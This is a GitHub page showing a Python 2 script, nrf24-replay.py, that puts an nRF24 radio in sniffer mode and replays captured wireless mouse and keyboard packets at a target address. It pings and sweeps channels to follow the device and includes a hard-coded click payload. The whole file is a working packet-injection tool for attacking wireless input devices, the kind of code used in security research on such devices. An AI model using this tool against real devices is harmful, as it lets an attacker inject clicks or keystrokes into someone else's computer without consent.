-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathnrf24-replay.py
executable file
·105 lines (79 loc) · 3.68 KB
/
nrf24-replay.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/env python
'''
Code to replay wireless mouse and keyboard packets
'''
import binascii, time, logging
from lib import common
# Parse command line arguments and initialize the radio
common.init_args('./nrf24-network-replay.py')
common.parser.add_argument('-a', '--address', type=str, help='Known address', required=True)
common.parser.add_argument('-i', '--input_file', type=str, help='file containing the captured packets', required=True)
common.parser.add_argument('-t', '--timeout', type=float, help='Channel timeout, in milliseconds', default=100)
common.parser.add_argument('-k', '--ack_timeout', type=int, help='ACK timeout in microseconds, accepts [250,4000], step 250', default=500)
common.parser.add_argument('-r', '--retries', type=int, help='Auto retry limit, accepts [0,15]', default='5', choices=xrange(0, 16), metavar='RETRIES')
common.parse_and_init()
# Parse the address
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
if len(address) < 2:
raise Exception('Invalid address: {0}'.format(common.args.address))
# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)
# Convert channel timeout from milliseconds to seconds
timeout = float(common.args.timeout) / float(1000)
#file containing the captured packets
input_file = common.args.input_file
# Format the ACK timeout and auto retry values
ack_timeout = int(common.args.ack_timeout / 250) - 1
ack_timeout = max(0, min(ack_timeout, 15))
retries = max(0, min(common.args.retries, 15))
ping_payload = '\x0F\x0F\x0F\x0F'
#click_payload ='\x01\x02\x00\x00\x03\x38'
click_payload = '\x00\xc2\x00\x00\x00\x00\x00\x00\x00>'
#Read pack
def ReadCapture():
payload = []
for line in open(input_file):
payload.append(line)
return payload
def replay(sendpayload,data):
#common.radio.set_channel(common.channels[channel_index])
# Attempt to ping the address
if common.radio.transmit_payload(sendpayload, ack_timeout, retries):
#valid_addresses.append(try_address)
print 'Sending Payload:'+' '+data
# Sweep through the channels and transmit on the active one
last_ping = time.time()
channel_index = 0
payloads = ReadCapture()
packetbuffer = True
while packetbuffer:
packetbuffer = len(payloads)
# Follow the target device if it changes channels
if time.time() - last_ping > timeout:
# First try pinging on the active channel
if not common.radio.transmit_payload(ping_payload, ack_timeout, retries):
# Ping failed on the active channel, so sweep through all available channels
success = False
for channel_index in range(len(common.channels)):
common.radio.set_channel(common.channels[channel_index])
if common.radio.transmit_payload(ping_payload, ack_timeout, retries):
# Ping successful, exit out of the ping sweep
last_ping = time.time()
logging.debug('Ping success on channel {0}'.format(common.channels[channel_index]))
data = payloads[0].strip('\n')
payload = binascii.a2b_hex(data.replace(':',''))
replay(payload,data)
del payloads[0]
success = True
break
# Ping sweep failed
if not success: logging.debug('Unable to ping {0}'.format(address_string))
# Ping succeeded on the active channel
else:
logging.debug('Ping success on channel {0}'.format(common.channels[channel_index]))
data = payloads[0].strip('\n')
payload = binascii.a2b_hex(data.replace(':',''))
replay(payload,data)
del payloads[0]
last_ping = time.time()